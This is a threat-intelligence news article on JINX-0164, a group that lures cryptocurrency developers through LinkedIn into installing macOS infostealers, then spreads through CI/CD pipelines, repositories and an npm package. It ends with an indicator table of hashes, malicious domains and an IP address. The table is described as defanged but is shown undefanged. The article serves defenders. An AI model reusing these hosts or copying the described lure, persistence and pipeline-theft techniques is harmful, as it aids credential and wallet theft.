A newly identified threat actor tracked as JINX-0164 is targeting cryptocurrency organizations through sophisticated LinkedIn-based social engineering campaigns.
The financially motivated group has been active since at least mid-2025. It is leveraging custom macOS malware, credential theft, and CI/CD pipeline abuse to infiltrate development environments and steal sensitive assets.
These profiles appeared highly credible, often featuring realistic employment histories and professional connections, making them difficult to distinguish from legitimate users.
In several cases, accounts were either hijacked or created solely for the campaign and later deleted after the attack.
The attack chain typically begins with a fake meeting invitation shared via LinkedIn messages. Victims are directed to malicious domains impersonating platforms such as Microsoft Teams.
Once accessed, the site prompts users to download a supposed meeting client or troubleshooting fix, which instead delivers a macOS malware payload.
In one documented case, the malware, dubbed AUDIOFIX, was deployed through a bash script hosted on a spoofed domain resembling an Apple driver portal.
The script delivered an architecture-aware payload compatible with both Intel and Apple Silicon devices. The malware masqueraded as a system process named coreaudiod, executed via launchctl, and established persistence on the infected machine.
AUDIOFIX functions as both an infostealer and a remote access Trojan. It harvests extensive data from compromised endpoints, including macOS Keychain credentials, browser passwords, SSH keys, cloud tokens, and cryptocurrency wallet information.
It also hijacks active sessions from applications like Slack, Discord, and Telegram, allowing attackers to expand their reach within organizations.
Wiz researchers said in a report shared with GBhackers, observed multiple intrusions where attackers initially approached developers posing as recruiters or business partners on LinkedIn.
Notably, the malware targets cloud infrastructure secrets such as AWS, Azure, and GCP credentials, along with GitHub tokens.
These tokens are then abused to extract sensitive data directly from CI/CD pipelines using tools like nord-stream, enabling attackers to access GitHub Actions secrets and other critical development assets.
JINX-0164 Uses LinkedIn Lures
Rather than focusing heavily on cloud resource exploitation, JINX-0164 prioritizes compromising software development workflows. After gaining access to a developer’s machine, the attackers inject malicious code into internal repositories to propagate the infection.
They employ stealthy Git techniques to avoid detection, including impersonating developers by altering commit metadata, pushing malicious code directly to main branches, or hijacking existing branches.
As other developers pull and build from these repositories, the malware spreads across the organization’s development infrastructure.
This approach effectively turns trusted codebases into infection vectors, increasing the likelihood of widespread compromise. In some cases, attackers attempted to modify source code to enable further credential theft, particularly targeting cryptocurrency wallets.
The group has also demonstrated supply chain attack capabilities. In April 2026, JINX-0164 compromised version 4.9.1 of the npm package @velora-dex/sdk by inserting a malicious script that downloaded a secondary backdoor called MINIRAT.
Unlike AUDIOFIX, MINIRAT is a lightweight Go-based backdoor focused on command execution and system reconnaissance.
Both malware families communicate with command-and-control servers over HTTPS and share common infrastructure, including domains such as datahub.ink. Attackers also obscured their activity using VPN services like Mullvad, Astrill, and ExpressVPN.
Although some tactics resemble those used by known North Korean threat groups, researchers found no direct infrastructure overlap, suggesting JINX-0164 is a distinct and capable actor.
Their consistent focus on developers and cryptocurrency platforms highlights a strategic effort to maximize financial gain while exploiting trust within software supply chains.
Indicators of Compromise (IOCs)
| Malware | Variant/Theme (Infrastructure) | Hash |
|---|---|---|
| MINIRAT | ARM64 | 0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270 |
| MINIRAT | x86_64 | 0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d |
| MINIRAT | ARM64 | a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b |
| AUDIOFIX | HTTPS/ARM64 | 65cba741fe30fa4799fb9002ea8de6d96042a59159dd7c3419c766af24c835e6 |
| AUDIOFIX | HTTPS/x86_64 | 0b1a36a31b952341a534fe24890f1ed2921ee259773cff46e4f6273b8c4d5d21 |
| AUDIOFIX | Dropbox/ARM64 | e8ee6f5145c9d503c5130bfc6585567f6e19d409158c3c0ca0b259f1875b15f4 |
| AUDIOFIX | Dropbox/x86_64 | 3e3901519c2305fbe9d5483b7234c25c6d2b562512916481d96f26b849c39fdb |
| Dropper | Fake audio fix (apple.driver-store.com) | 9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a |
| Dropper | Fake audio fix (apple.driver-update.io) | 402625ec79e3573a80b6de9b33fc1e503e3c7803603cd958ddd515fb0549007c |
| Dropper | Fake audio fix (driver-updater.net) | b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17 |
| Dropper | Fake Chrome update (apple.driver-store.com) | d4e863f9818bfb2f1dd932df6441dff204e6142c3bdb55b298cb08dc7b6a0c62 |
| Dropper | Delivered via supply chain (89.36.224.5) | c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e |
| Dropper | Delivered via supply chain (89.36.224.5) | 2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
